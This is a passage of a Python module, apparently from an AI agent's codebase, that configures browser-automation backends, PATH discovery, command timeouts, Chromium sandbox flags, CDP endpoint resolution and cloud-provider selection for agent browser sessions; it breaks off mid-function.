4815 lines
196 KiB
Python
4815 lines
196 KiB
Python
#!/usr/bin/env python3
|
|
"""Browser automation tools driven by the agent-browser CLI.
|
|
|
|
Backends — local headless Chromium (default; ``agent-browser install
|
|
[--with-deps]`` one-time setup), Browser Use / Browserbase / Firecrawl cloud
|
|
(auto-detected from config + credentials), a user-supplied CDP endpoint, or
|
|
Camofox — share one agent-facing behaviour: per-task sessions, text snapshots
|
|
of the accessibility tree with ``@eN`` element refs, and automatic cleanup.
|
|
|
|
Env: BROWSERBASE_API_KEY / BROWSERBASE_PROJECT_ID / BROWSER_USE_API_KEY select
|
|
direct cloud credentials; BROWSERBASE_PROXIES (default "true"),
|
|
BROWSERBASE_ADVANCED_STEALTH ("false", Scale plan), BROWSERBASE_KEEP_ALIVE
|
|
("true", paid plan) and BROWSERBASE_SESSION_TIMEOUT (seconds, max 21600) tune
|
|
Browserbase sessions. Behavioural settings live under ``browser.*`` in config.yaml.
|
|
|
|
Sibling modules hold extracted clusters (eval policy, lightpanda fallback,
|
|
real-profile CDP, snapshot store); their names are re-imported here so
|
|
``patch("tools.browser_tool.X")`` keeps working.
|
|
"""
|
|
|
|
import atexit
|
|
import contextlib
|
|
import functools
|
|
import json
|
|
import logging
|
|
import os
|
|
import signal
|
|
import subprocess
|
|
import shutil
|
|
import sys
|
|
import tempfile
|
|
import threading
|
|
import time
|
|
from datetime import datetime, timezone
|
|
from typing import Dict, Any, Optional, List, Tuple, Union
|
|
from pathlib import Path
|
|
from agent.redact import redact_cdp_url
|
|
from hermes_constants import (
|
|
agent_browser_runnable,
|
|
get_hermes_home,
|
|
get_hermes_home_override,
|
|
hermes_home_key,
|
|
node_tool_runnable,
|
|
reset_hermes_home_override,
|
|
set_hermes_home_override,
|
|
)
|
|
from utils import env_int, is_truthy_value
|
|
from hermes_cli.config import DEFAULT_CONFIG, cfg_get
|
|
from hermes_cli._subprocess_compat import windows_hide_flags
|
|
|
|
|
|
def __getattr__(name: str):
|
|
"""Lazy module attributes (PEP 562): ``requests`` and ``call_llm`` load on first use.
|
|
|
|
First access binds the real object into module globals so the test-patch
|
|
surface (``patch("tools.browser_tool.requests.get")`` / ``.call_llm``) works.
|
|
"""
|
|
if name == "requests":
|
|
import requests as _requests
|
|
|
|
globals()["requests"] = _requests
|
|
return _requests
|
|
if name == "call_llm":
|
|
from agent.auxiliary_client import call_llm as _call_llm
|
|
|
|
globals()["call_llm"] = _call_llm
|
|
return _call_llm
|
|
raise AttributeError(f"module {__name__!r} has no attribute {name!r}")
|
|
|
|
|
|
def _lazy_call_llm(*args, **kwargs):
|
|
"""Invoke ``call_llm`` through module globals so test patches of
|
|
``tools.browser_tool.call_llm`` are honored, importing lazily otherwise."""
|
|
fn = globals().get("call_llm")
|
|
if fn is None:
|
|
fn = __getattr__("call_llm")
|
|
return fn(*args, **kwargs)
|
|
|
|
# Keys re-added to the agent-browser subprocess env AFTER credential stripping.
|
|
# agent-browser is a Node process loading npm deps: a compromised transitive
|
|
# dependency could read every Hermes secret from process.env, so only the
|
|
# browser-backend keys the worker legitimately needs pass through.
|
|
_BROWSER_PASSTHROUGH_KEYS: tuple[str, ...] = (
|
|
"BROWSERBASE_API_KEY",
|
|
"BROWSERBASE_PROJECT_ID",
|
|
"BROWSER_USE_API_KEY",
|
|
"FIRECRAWL_API_KEY",
|
|
"FIRECRAWL_API_URL",
|
|
"FIRECRAWL_BROWSER_TTL",
|
|
)
|
|
|
|
|
|
def _build_browser_env() -> dict:
|
|
"""Credential-scrubbed env for an agent-browser subprocess (only browser-backend keys re-added).
|
|
|
|
The ``hermes_subprocess_env`` import is deferred so the module imports under
|
|
test harnesses that stub the ``tools`` package.
|
|
"""
|
|
from tools.environments.local import hermes_subprocess_env
|
|
|
|
env = hermes_subprocess_env(inherit_credentials=False)
|
|
for _key in _BROWSER_PASSTHROUGH_KEYS:
|
|
if _key in os.environ:
|
|
env[_key] = os.environ[_key]
|
|
return env
|
|
|
|
try:
|
|
from tools.website_policy import check_website_access
|
|
except Exception:
|
|
check_website_access = lambda url: None # noqa: E731 — fail-open if policy module unavailable
|
|
|
|
try:
|
|
from tools.url_safety import (
|
|
is_safe_url as _is_safe_url,
|
|
is_always_blocked_url as _is_always_blocked_url,
|
|
normalize_url_for_request as _normalize_url_for_request,
|
|
sensitive_query_param_name as _sensitive_query_param_name,
|
|
)
|
|
except Exception:
|
|
_is_safe_url = lambda url: False # noqa: E731 — fail-closed: block all if safety module unavailable
|
|
_is_always_blocked_url = lambda url: True # noqa: E731 — fail-closed on the floor too
|
|
_normalize_url_for_request = lambda url: url # noqa: E731 — best-effort fallback
|
|
_sensitive_query_param_name = lambda url: None # noqa: E731 — best-effort fallback
|
|
# Browser-provider ABC + registry. Per-vendor providers live under
|
|
# ``plugins/browser/<vendor>/``; the legacy class names are re-exported below as
|
|
# backward-compat shims for callers that import them from this module.
|
|
from agent.browser_provider import BrowserProvider as CloudBrowserProvider # noqa: F401 (legacy alias)
|
|
from agent.browser_registry import ( # noqa: F401 (test-patchable surface)
|
|
get_provider as _registry_get_browser_provider,
|
|
)
|
|
try:
|
|
from agent.browser_registry import (
|
|
registry_generation as _browser_registry_generation,
|
|
)
|
|
except ImportError:
|
|
# A few isolated compatibility tests intentionally install a minimal
|
|
# ``agent.browser_registry`` stub exposing only ``get_provider``. Those
|
|
# harnesses have no mutable registry, so a constant generation is exact.
|
|
def _browser_registry_generation(*, scope=None):
|
|
return (0, 0)
|
|
from plugins.browser.browserbase.provider import ( # noqa: F401 (legacy import surface)
|
|
BrowserbaseBrowserProvider as BrowserbaseProvider,
|
|
)
|
|
from plugins.browser.browser_use.provider import ( # noqa: F401
|
|
BrowserUseBrowserProvider as BrowserUseProvider,
|
|
)
|
|
from plugins.browser.firecrawl.provider import ( # noqa: F401
|
|
FirecrawlBrowserProvider as FirecrawlProvider,
|
|
)
|
|
from tools.tool_backend_helpers import normalize_browser_cloud_provider
|
|
# Camofox local anti-detection browser backend (optional).
|
|
# When CAMOFOX_URL is set, all browser operations route through the
|
|
# camofox REST API instead of the agent-browser CLI.
|
|
try:
|
|
from tools.browser_camofox import is_camofox_mode as _is_camofox_mode
|
|
except ImportError:
|
|
_is_camofox_mode = lambda: False # noqa: E731
|
|
# Browser Use CLI (optional)
|
|
try:
|
|
from tools.browser_use_cli import is_browser_use_cli_mode as _is_browser_use_cli_mode
|
|
except ImportError:
|
|
_is_browser_use_cli_mode = lambda: False # noqa: E731
|
|
|
|
logger = logging.getLogger(__name__)
|
|
|
|
# Standard PATH entries for environments with minimal PATH (e.g. systemd services).
|
|
# Includes Android/Termux and macOS Homebrew locations needed for agent-browser,
|
|
# npx, node, and Android's glibc runner (grun).
|
|
_SANE_PATH_DIRS = (
|
|
"/data/data/com.termux/files/usr/bin",
|
|
"/data/data/com.termux/files/usr/sbin",
|
|
"/opt/homebrew/bin",
|
|
"/opt/homebrew/sbin",
|
|
"/usr/local/sbin",
|
|
"/usr/local/bin",
|
|
"/usr/sbin",
|
|
"/usr/bin",
|
|
"/sbin",
|
|
"/bin",
|
|
)
|
|
_SANE_PATH = os.pathsep.join(_SANE_PATH_DIRS)
|
|
|
|
|
|
@functools.lru_cache(maxsize=1)
|
|
def _discover_homebrew_node_dirs() -> tuple[str, ...]:
|
|
"""Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24).
|
|
|
|
When Node is installed via ``brew install node@24`` and NOT linked into
|
|
/opt/homebrew/bin, agent-browser isn't discoverable on the default PATH.
|
|
This function finds those directories so they can be prepended.
|
|
"""
|
|
dirs: list[str] = []
|
|
homebrew_opt = "/opt/homebrew/opt"
|
|
if not os.path.isdir(homebrew_opt):
|
|
return tuple(dirs)
|
|
try:
|
|
for entry in os.listdir(homebrew_opt):
|
|
if entry.startswith("node") and entry != "node":
|
|
bin_dir = os.path.join(homebrew_opt, entry, "bin")
|
|
if os.path.isdir(bin_dir):
|
|
dirs.append(bin_dir)
|
|
except OSError:
|
|
pass
|
|
return tuple(dirs)
|
|
|
|
|
|
def _browser_candidate_path_dirs() -> list[str]:
|
|
"""Return ordered browser CLI PATH candidates shared by discovery and execution."""
|
|
hermes_home = get_hermes_home()
|
|
hermes_node_bin = str(hermes_home / "node" / "bin")
|
|
hermes_node_root = str(hermes_home / "node")
|
|
hermes_nm_bin = str(hermes_home / "node_modules" / ".bin")
|
|
return [hermes_node_bin, hermes_node_root, hermes_nm_bin, *list(_discover_homebrew_node_dirs()), *_SANE_PATH_DIRS]
|
|
|
|
|
|
def _merge_browser_path(existing_path: str = "") -> str:
|
|
"""Prepend browser-specific PATH fallbacks without reordering existing entries."""
|
|
path_parts = [p for p in (existing_path or "").split(os.pathsep) if p]
|
|
existing_parts = set(path_parts)
|
|
prefix_parts: list[str] = []
|
|
|
|
for part in _browser_candidate_path_dirs():
|
|
if not part or part in existing_parts or part in prefix_parts:
|
|
continue
|
|
if os.path.isdir(part):
|
|
prefix_parts.append(part)
|
|
|
|
return os.pathsep.join(prefix_parts + path_parts)
|
|
|
|
# Throttle screenshot cleanup to avoid repeated full directory scans.
|
|
_last_screenshot_cleanup_by_dir: dict[str, float] = {}
|
|
|
|
# ============================================================================
|
|
# Configuration
|
|
# ============================================================================
|
|
|
|
# Default timeout for browser commands (seconds)
|
|
DEFAULT_COMMAND_TIMEOUT = 30
|
|
|
|
# Floor for ``open`` (navigate) — cold daemon + first Chromium launch can exceed
|
|
# the generic command_timeout on slow or library-starved Linux hosts.
|
|
MIN_OPEN_TIMEOUT = 60
|
|
MIN_FIRST_OPEN_TIMEOUT = 120
|
|
|
|
# Default max chars for snapshot content before truncation. Aligned with
|
|
# web_tools.DEFAULT_EXTRACT_CHAR_LIMIT (15000) — the snapshot and
|
|
# web_extract paths share the same truncate-and-store pattern, so the model
|
|
# gets the same per-page budget from both. Configurable via
|
|
# ``browser.snapshot_threshold`` in config.yaml.
|
|
DEFAULT_SNAPSHOT_THRESHOLD = 15000
|
|
MIN_SNAPSHOT_THRESHOLD = 1000
|
|
|
|
# Backwards-compatible import surface. Runtime call sites use
|
|
# ``get_browser_snapshot_threshold()`` so config overrides take effect.
|
|
SNAPSHOT_SUMMARIZE_THRESHOLD = DEFAULT_SNAPSHOT_THRESHOLD
|
|
|
|
# Hard ceiling on the full-snapshot file written to cache/web when a snapshot
|
|
# is truncated. Mirrors web_tools.MAX_STORED_TEXT_CHARS —
|
|
# the model only ever sees the truncated view; the stored copy exists for
|
|
# read_file paging and must not write unbounded bytes to disk.
|
|
MAX_STORED_SNAPSHOT_CHARS = 2_000_000
|
|
|
|
# Commands that legitimately return empty stdout (e.g. close, record).
|
|
_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"})
|
|
|
|
_cached_command_timeout: Optional[int] = None
|
|
_command_timeout_resolved = False
|
|
_cached_snapshot_threshold: Optional[int] = None
|
|
_snapshot_threshold_resolved = False
|
|
|
|
|
|
def _sanitize_url_for_logs(value: object) -> str:
|
|
"""Mask secrets in logged CDP URLs; :func:`agent.redact.redact_cdp_url` is the single policy."""
|
|
return redact_cdp_url(value)
|
|
|
|
|
|
def _browser_cfg(key: str, default, parse, log_label: str):
|
|
"""Read ``browser.<key>`` from the raw profile config and ``parse`` it.
|
|
|
|
Returns ``default`` when the key is absent, the section is not a mapping,
|
|
or reading/parsing raises (logged at debug as "Could not read <log_label>").
|
|
Raw config is used so tool JSON output is not affected by loader warnings.
|
|
"""
|
|
try:
|
|
from hermes_cli.config import read_raw_config
|
|
browser_cfg = read_raw_config().get("browser", {})
|
|
if isinstance(browser_cfg, dict) and key in browser_cfg:
|
|
return parse(browser_cfg[key])
|
|
except Exception as e:
|
|
logger.debug("Could not read %s: %s", log_label, e)
|
|
return default
|
|
|
|
|
|
def _get_command_timeout() -> int:
|
|
"""Return ``browser.command_timeout`` (floored at 5s; default 30s).
|
|
|
|
Cached after the first call and cleared by ``cleanup_all_browsers()``.
|
|
"""
|
|
global _cached_command_timeout, _command_timeout_resolved
|
|
if _command_timeout_resolved and _cached_command_timeout is not None:
|
|
return _cached_command_timeout
|
|
|
|
result = _browser_cfg(
|
|
"command_timeout", DEFAULT_COMMAND_TIMEOUT,
|
|
lambda v: DEFAULT_COMMAND_TIMEOUT if v is None else max(int(v), 5),
|
|
"command_timeout from config",
|
|
)
|
|
# Assign the cached value BEFORE flipping the resolved flag so a
|
|
# concurrent reader cannot observe ``resolved=True`` with a ``None`` cache.
|
|
_cached_command_timeout = result
|
|
_command_timeout_resolved = True
|
|
return result
|
|
|
|
|
|
def _safe_command_timeout() -> int:
|
|
"""``_get_command_timeout`` guaranteed non-None (cache reset mid-flight).
|
|
|
|
Uses ``is not None`` rather than ``or`` so a configured ``0`` is preserved.
|
|
"""
|
|
val = _get_command_timeout()
|
|
return val if val is not None else DEFAULT_COMMAND_TIMEOUT
|
|
|
|
|
|
def get_browser_snapshot_threshold() -> int:
|
|
"""Return ``browser.snapshot_threshold`` (floored at MIN_SNAPSHOT_THRESHOLD).
|
|
|
|
Cached for the browser lifecycle and reset by :func:`cleanup_all_browsers`.
|
|
"""
|
|
global _cached_snapshot_threshold, _snapshot_threshold_resolved
|
|
if _snapshot_threshold_resolved and _cached_snapshot_threshold is not None:
|
|
return _cached_snapshot_threshold
|
|
|
|
result = _browser_cfg(
|
|
"snapshot_threshold", DEFAULT_SNAPSHOT_THRESHOLD,
|
|
lambda v: DEFAULT_SNAPSHOT_THRESHOLD if v is None else max(int(v), MIN_SNAPSHOT_THRESHOLD),
|
|
"browser.snapshot_threshold",
|
|
)
|
|
# Same race-safety invariant as the command-timeout cache.
|
|
_cached_snapshot_threshold = result
|
|
_snapshot_threshold_resolved = True
|
|
return result
|
|
|
|
|
|
def _get_open_command_timeout(*, first_open: bool = False) -> int:
|
|
"""Timeout for agent-browser ``open`` (navigation / daemon cold start)."""
|
|
base = _safe_command_timeout()
|
|
floor = MIN_FIRST_OPEN_TIMEOUT if first_open else MIN_OPEN_TIMEOUT
|
|
return max(base, floor)
|
|
|
|
|
|
def _needs_chromium_sandbox_bypass() -> bool:
|
|
"""Return True when Chromium needs --no-sandbox to start reliably."""
|
|
if hasattr(os, "geteuid") and os.geteuid() == 0:
|
|
return True
|
|
if _running_in_docker():
|
|
return True
|
|
userns_restrict = "/proc/sys/kernel/apparmor_restrict_unprivileged_userns"
|
|
try:
|
|
with open(userns_restrict, encoding="utf-8") as f:
|
|
if f.read().strip() == "1":
|
|
return True
|
|
except OSError:
|
|
pass
|
|
return False
|
|
|
|
|
|
def _apply_chromium_sandbox_args(browser_env: Dict[str, str]) -> None:
|
|
"""Add required Chromium sandbox flags without overriding user settings."""
|
|
if (
|
|
"AGENT_BROWSER_ARGS" not in browser_env
|
|
and "AGENT_BROWSER_CHROME_FLAGS" not in browser_env
|
|
and _needs_chromium_sandbox_bypass()
|
|
):
|
|
logger.debug(
|
|
"browser: sandbox bypass needed (root/docker/AppArmor userns) — "
|
|
"injecting --no-sandbox"
|
|
)
|
|
browser_env["AGENT_BROWSER_ARGS"] = "--no-sandbox,--disable-dev-shm-usage"
|
|
|
|
|
|
def _read_command_output_files(stdout_path: str, stderr_path: str) -> tuple[str, str]:
|
|
"""Best-effort read of agent-browser stdout/stderr temp files."""
|
|
stdout = stderr = ""
|
|
for path, slot in ((stdout_path, "stdout"), (stderr_path, "stderr")):
|
|
try:
|
|
with open(path, "r", encoding="utf-8") as f:
|
|
text = f.read().strip()
|
|
except OSError:
|
|
continue
|
|
if slot == "stdout":
|
|
stdout = text
|
|
else:
|
|
stderr = text
|
|
return stdout, stderr
|
|
|
|
|
|
def _unlink_command_output_files(*paths: str) -> None:
|
|
for path in paths:
|
|
try:
|
|
os.unlink(path)
|
|
except OSError:
|
|
pass
|
|
|
|
|
|
def _format_browser_timeout_error(
|
|
command: str,
|
|
timeout: int,
|
|
stdout: str,
|
|
stderr: str,
|
|
) -> str:
|
|
"""Build an actionable timeout message from captured daemon output."""
|
|
parts = [f"Command timed out after {timeout} seconds"]
|
|
detail = (stderr or stdout or "").strip()
|
|
if detail:
|
|
parts.append(detail[:1500])
|
|
|
|
combined = f"{stderr}\n{stdout}".lower()
|
|
hints: list[str] = []
|
|
if "sandbox" in combined:
|
|
hints.append(
|
|
"Chromium sandbox launch failed. Set AGENT_BROWSER_ARGS="
|
|
"'--no-sandbox,--disable-dev-shm-usage' in your environment, "
|
|
"or run: npx agent-browser install --with-deps"
|
|
)
|
|
elif command == "open" and _is_local_mode():
|
|
if _running_in_docker():
|
|
hints.append(
|
|
"The browser daemon may still be starting or Chromium may be "
|
|
"missing. Pull the latest image: "
|
|
"docker pull ghcr.io/nousresearch/hermes-agent:latest"
|
|
)
|
|
else:
|
|
hints.append(
|
|
"The browser daemon may still be starting, or Chromium may be "
|
|
"missing system libraries. Install/repair with: "
|
|
"npx agent-browser install --with-deps "
|
|
"(or: npx playwright install --with-deps chromium)"
|
|
)
|
|
if hints:
|
|
parts.extend(hints)
|
|
return "\n".join(parts)
|
|
|
|
|
|
def _get_vision_model() -> Optional[str]:
|
|
"""Model for browser_vision (screenshot analysis — multimodal)."""
|
|
return os.getenv("AUXILIARY_VISION_MODEL", "").strip() or None
|
|
|
|
|
|
def _resolve_cdp_override(cdp_url: str) -> str:
|
|
"""Normalize a user-supplied CDP endpoint into a concrete websocket URL.
|
|
|
|
Full ``ws://.../devtools/browser/...`` endpoints pass through; HTTP
|
|
discovery roots and bare ``ws://host:port`` are resolved via
|
|
``/json/version`` → ``webSocketDebuggerUrl`` (falls back to the raw value
|
|
with a warning if discovery fails).
|
|
"""
|
|
raw = (cdp_url or "").strip()
|
|
if not raw:
|
|
return ""
|
|
|
|
lowered = raw.lower()
|
|
if "/devtools/browser/" in lowered:
|
|
return raw
|
|
|
|
discovery_url = raw
|
|
if lowered.startswith(("ws://", "wss://")):
|
|
if raw.count(":") == 2 and raw.rstrip("/").rsplit(":", 1)[-1].isdigit() and "/" not in raw.split(":", 2)[-1]:
|
|
discovery_url = ("http://" if lowered.startswith("ws://") else "https://") + raw.split("://", 1)[1]
|
|
else:
|
|
return raw
|
|
|
|
if discovery_url.lower().endswith("/json/version"):
|
|
version_url = discovery_url
|
|
else:
|
|
version_url = discovery_url.rstrip("/") + "/json/version"
|
|
|
|
try:
|
|
import requests # lazy — shared module object, test patches still apply
|
|
|
|
response = requests.get(version_url, timeout=10)
|
|
response.raise_for_status()
|
|
payload = response.json()
|
|
except Exception as exc:
|
|
logger.warning(
|
|
"Failed to resolve CDP endpoint %s via %s: %s",
|
|
_sanitize_url_for_logs(raw),
|
|
_sanitize_url_for_logs(version_url),
|
|
_sanitize_url_for_logs(exc),
|
|
)
|
|
return raw
|
|
|
|
ws_url = str(payload.get("webSocketDebuggerUrl") or "").strip()
|
|
if ws_url:
|
|
logger.info(
|
|
"Resolved CDP endpoint %s -> %s",
|
|
_sanitize_url_for_logs(raw),
|
|
_sanitize_url_for_logs(ws_url),
|
|
)
|
|
return ws_url
|
|
|
|
logger.warning(
|
|
"CDP discovery at %s did not return webSocketDebuggerUrl; using raw endpoint",
|
|
_sanitize_url_for_logs(version_url),
|
|
)
|
|
return raw
|
|
|
|
|
|
def _get_cdp_override_raw() -> str:
|
|
"""Return the *configured* CDP override without any network I/O.
|
|
|
|
Precedence: ``BROWSER_CDP_URL`` env (live ``/browser connect`` override),
|
|
then ``browser.cdp_url`` in config.yaml. Callers that only need to know
|
|
*whether* an override exists (check_fn gates, ``_is_local_mode`` /
|
|
``_is_local_backend``, ``hermes doctor``) MUST use this, not
|
|
:func:`_get_cdp_override`: that one does a 10s HTTP discovery, and a stale
|
|
``cdp_url`` pointing at a dead Chrome would stall every startup's schema
|
|
build with no error — no side effects during schema build.
|
|
"""
|
|
env_override = os.environ.get("BROWSER_CDP_URL", "").strip()
|
|
if env_override:
|
|
return env_override
|
|
return _browser_cfg(
|
|
"cdp_url", "", lambda v: str(v or "").strip(), "browser.cdp_url from config"
|
|
)
|
|
|
|
|
|
def _get_cdp_override() -> str:
|
|
"""Return the resolved CDP URL override, or "" (skips cloud AND local launch).
|
|
|
|
May perform an HTTP ``/json/version`` discovery request — only call on
|
|
paths about to *connect* (session creation, supervisor attach); pure
|
|
is-it-configured gates must use :func:`_get_cdp_override_raw`.
|
|
"""
|
|
raw = _get_cdp_override_raw()
|
|
if not raw:
|
|
return ""
|
|
return _resolve_cdp_override(raw)
|
|
|
|
|
|
def _get_dialog_policy_config() -> Tuple[str, float]:
|
|
"""Read ``browser.dialog_policy`` + ``browser.dialog_timeout_s`` from config.
|
|
|
|
Returns a ``(policy, timeout_s)`` tuple, falling back to the supervisor's
|
|
defaults when keys are absent or invalid.
|
|
"""
|
|
# Defer imports so browser_tool can be imported in minimal environments.
|
|
from tools.browser_supervisor import (
|
|
DEFAULT_DIALOG_POLICY,
|
|
DEFAULT_DIALOG_TIMEOUT_S,
|
|
_VALID_POLICIES,
|
|
)
|
|
|
|
try:
|
|
from hermes_cli.config import read_raw_config
|
|
|
|
cfg = read_raw_config()
|
|
browser_cfg = cfg.get("browser", {}) if isinstance(cfg, dict) else {}
|
|
if not isinstance(browser_cfg, dict):
|
|
return DEFAULT_DIALOG_POLICY, DEFAULT_DIALOG_TIMEOUT_S
|
|
policy = str(browser_cfg.get("dialog_policy") or DEFAULT_DIALOG_POLICY)
|
|
if policy not in _VALID_POLICIES:
|
|
logger.debug("Invalid browser.dialog_policy=%r; using default", policy)
|
|
policy = DEFAULT_DIALOG_POLICY
|
|
timeout_raw = browser_cfg.get("dialog_timeout_s")
|
|
try:
|
|
timeout_s = float(timeout_raw) if timeout_raw is not None else DEFAULT_DIALOG_TIMEOUT_S
|
|
if timeout_s <= 0:
|
|
timeout_s = DEFAULT_DIALOG_TIMEOUT_S
|
|
except (TypeError, ValueError):
|
|
timeout_s = DEFAULT_DIALOG_TIMEOUT_S
|
|
return policy, timeout_s
|
|
except Exception:
|
|
return DEFAULT_DIALOG_POLICY, DEFAULT_DIALOG_TIMEOUT_S
|
|
|
|
|
|
def _ensure_cdp_supervisor(task_id: str) -> None:
|
|
"""Start a CDP supervisor for ``task_id`` if an endpoint is reachable.
|
|
|
|
Idempotent (``SupervisorRegistry.get_or_start`` skips an existing
|
|
``(task_id, cdp_url)`` and restarts on URL change), so safe on every
|
|
navigate / ``/browser connect``. URL precedence: the CDP override, then the
|
|
session's own ``cdp_url`` (cloud providers). Swallows all errors — a failed
|
|
attach must not break the session; snapshots just lack
|
|
``pending_dialogs`` / ``frame_tree``.
|
|
"""
|
|
cdp_url = _get_cdp_override()
|
|
if not cdp_url:
|
|
# Fallback: active session may carry a per-session CDP URL from a
|
|
# cloud provider (Browserbase sets this).
|
|
with _cleanup_lock:
|
|
session_info = _active_sessions.get(task_id, {})
|
|
maybe = str(session_info.get("cdp_url") or "")
|
|
if maybe:
|
|
cdp_url = _resolve_cdp_override(maybe)
|
|
if not cdp_url:
|
|
return
|
|
try:
|
|
from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
|
|
|
|
policy, timeout_s = _get_dialog_policy_config()
|
|
SUPERVISOR_REGISTRY.get_or_start(
|
|
task_id=task_id,
|
|
cdp_url=cdp_url,
|
|
dialog_policy=policy,
|
|
dialog_timeout_s=timeout_s,
|
|
)
|
|
except Exception as exc:
|
|
logger.debug(
|
|
"CDP supervisor attach for task=%s failed (non-fatal): %s",
|
|
task_id,
|
|
exc,
|
|
)
|
|
|
|
|
|
def _stop_cdp_supervisor(task_id: str) -> None:
|
|
"""Stop the CDP supervisor for ``task_id`` if one exists. No-op otherwise."""
|
|
try:
|
|
from tools.browser_supervisor import SUPERVISOR_REGISTRY # type: ignore[import-not-found]
|
|
|
|
SUPERVISOR_REGISTRY.stop(task_id)
|
|
except Exception as exc:
|
|
logger.debug("CDP supervisor stop for task=%s failed (non-fatal): %s", task_id, exc)
|
|
|
|
|
|
# ============================================================================
|
|
# Cloud Provider Registry
|
|
# ============================================================================
|
|
#
|
|
# Per-vendor providers live as plugins under ``plugins/browser/<vendor>/`` and
|
|
# self-register with :mod:`agent.browser_registry`, which is what
|
|
# ``_get_cloud_provider()`` consults. The legacy class-name dict below is a
|
|
# backward-compat shim: when a test monkeypatches it, it is honoured;
|
|
# otherwise the registry-backed path wins.
|
|
|
|
_PROVIDER_REGISTRY: Dict[str, type] = {
|
|
"browserbase": BrowserbaseProvider,
|
|
"browser-use": BrowserUseProvider,
|
|
"firecrawl": FirecrawlProvider,
|
|
}
|
|
# Frozen copy of the import-time _PROVIDER_REGISTRY, used by
|
|
# ``_is_legacy_provider_registry_overridden`` to detect test-time
|
|
# monkeypatching. NEVER mutate this dict.
|
|
_DEFAULT_PROVIDER_REGISTRY: Dict[str, type] = dict(_PROVIDER_REGISTRY)
|
|
|
|
_cached_cloud_provider: Optional[CloudBrowserProvider] = None
|
|
_cloud_provider_resolved = False
|
|
_cached_cloud_provider_scope: Optional[str] = None
|
|
_cached_cloud_providers: Dict[
|
|
tuple[str, tuple[int, int]], Optional[CloudBrowserProvider]
|
|
] = {}
|
|
_cloud_provider_cache_lock = threading.RLock()
|
|
_allow_private_urls_resolved = False
|
|
_cached_allow_private_urls: Optional[bool] = None
|
|
_cached_agent_browser: Optional[str] = None
|
|
_agent_browser_resolved = False
|
|
|
|
# Lightpanda engine support — cached like _get_cloud_provider().
|
|
# agent-browser v0.25.3+ supports ``--engine lightpanda`` natively.
|
|
_cached_browser_engine: Optional[str] = None
|
|
_browser_engine_resolved = False
|
|
|
|
|
|
def _is_legacy_provider_registry_overridden() -> bool:
|
|
"""True when a test has patched ``_PROVIDER_REGISTRY`` to a custom value.
|
|
|
|
Each registered value is compared by identity against the canonical class
|
|
in ``_DEFAULT_PROVIDER_REGISTRY`` (extra keys count too); adding a built-in
|
|
provider only requires extending that default dict.
|
|
"""
|
|
try:
|
|
for key, default_cls in _DEFAULT_PROVIDER_REGISTRY.items():
|
|
if _PROVIDER_REGISTRY.get(key) is not default_cls:
|
|
return True
|
|
# Extra keys not in the default registry → also an override.
|
|
return len(_PROVIDER_REGISTRY) != len(_DEFAULT_PROVIDER_REGISTRY)
|
|
except Exception:
|
|
return False
|
|
|
|
|
|
def _ensure_browser_plugins_loaded() -> None:
|
|
"""Idempotently trigger plugin discovery so the browser registry is populated.
|
|
|
|
``model_tools`` normally does this as an import side effect, but
|
|
``_get_cloud_provider`` is also reached from standalone scripts and test
|
|
harnesses that never import it; cheap on repeat calls.
|
|
"""
|
|
try:
|
|
from hermes_cli.plugins import _ensure_plugins_discovered
|
|
|
|
_ensure_plugins_discovered()
|
|
except Exception as exc:
|
|
logger.debug("Browser plugin discovery failed (non-fatal): %s", exc)
|
|
|
|
|
|
def _get_cloud_provider() -> Optional[CloudBrowserProvider]:
|
|
"""Return the provider cached for the active Hermes profile."""
|
|
global _cached_cloud_provider, _cloud_provider_resolved
|
|
global _cached_cloud_provider_scope
|
|
|
|
scope = hermes_home_key()
|
|
with _cloud_provider_cache_lock:
|
|
# Tests and legacy reset paths clear the boolean. Treat that as a full
|
|
# reset even if a previous scoped resolution remains mirrored here.
|
|
if not _cloud_provider_resolved:
|
|
_cached_cloud_provider_scope = None
|
|
_cached_cloud_providers.clear()
|
|
while True:
|
|
before_generation = _browser_registry_generation(scope=scope)
|
|
cache_key = (scope, before_generation)
|
|
if cache_key in _cached_cloud_providers:
|
|
_cached_cloud_provider = _cached_cloud_providers[cache_key]
|
|
_cloud_provider_resolved = True
|
|
_cached_cloud_provider_scope = scope
|
|
return _cached_cloud_provider
|
|
|
|
_cached_cloud_provider = None
|
|
_cloud_provider_resolved = False
|
|
resolved = _resolve_cloud_provider_uncached()
|
|
after_generation = _browser_registry_generation(scope=scope)
|
|
if before_generation != after_generation:
|
|
# A force reload replaced/unloaded this profile's provider
|
|
# while resolution was in progress. Discard the stale result
|
|
# and resolve against the new registry generation.
|
|
continue
|
|
if _cloud_provider_resolved:
|
|
_cached_cloud_provider_scope = scope
|
|
for stale_key in [
|
|
key for key in _cached_cloud_providers if key[0] == scope
|
|
]:
|
|
_cached_cloud_providers.pop(stale_key, None)
|
|
_cached_cloud_providers[cache_key] = resolved
|
|
return resolved
|
|
|
|
|
|
def _instantiate_explicit_cloud_provider(provider_key: str) -> Optional[CloudBrowserProvider]:
|
|
"""Build the provider named by ``browser.cloud_provider``.
|
|
|
|
Test fixtures that patch ``_PROVIDER_REGISTRY`` drive the legacy dict;
|
|
otherwise the plugin registry is consulted (after idempotent discovery).
|
|
Strict selection: a stored-but-unregistered name raises ``ValueError``
|
|
(never a silent reroute to auto-detect). Any other instantiation error is
|
|
logged and yields None so the next call retries.
|
|
"""
|
|
try:
|
|
if _is_legacy_provider_registry_overridden():
|
|
factory = _PROVIDER_REGISTRY.get(provider_key)
|
|
resolved = factory() if factory is not None else None
|
|
else:
|
|
_ensure_browser_plugins_loaded()
|
|
resolved = _registry_get_browser_provider(provider_key)
|
|
if resolved is None:
|
|
from tools.tool_backend_helpers import selection_error
|
|
|
|
raise ValueError(selection_error(
|
|
"browser",
|
|
f"'{provider_key}'",
|
|
"no registered browser plugin has that name (install "
|
|
"the corresponding plugin or fix the config key "
|
|
"spelling)",
|
|
))
|
|
return resolved
|
|
except ValueError:
|
|
raise
|
|
except Exception:
|
|
logger.warning(
|
|
"Failed to instantiate explicit cloud_provider %r; will retry on next call",
|
|
provider_key,
|
|
exc_info=True,
|
|
)
|
|
return None
|
|
|
|
|
|
def _autodetect_cloud_provider() -> Optional[CloudBrowserProvider]:
|
|
"""Auto-detect: Browser Use (managed Nous gateway or API key), then Browserbase.
|
|
|
|
Uses the legacy class names bound on this module so tests that
|
|
``monkeypatch.setattr(browser_tool, "BrowserUseProvider", ...)`` keep
|
|
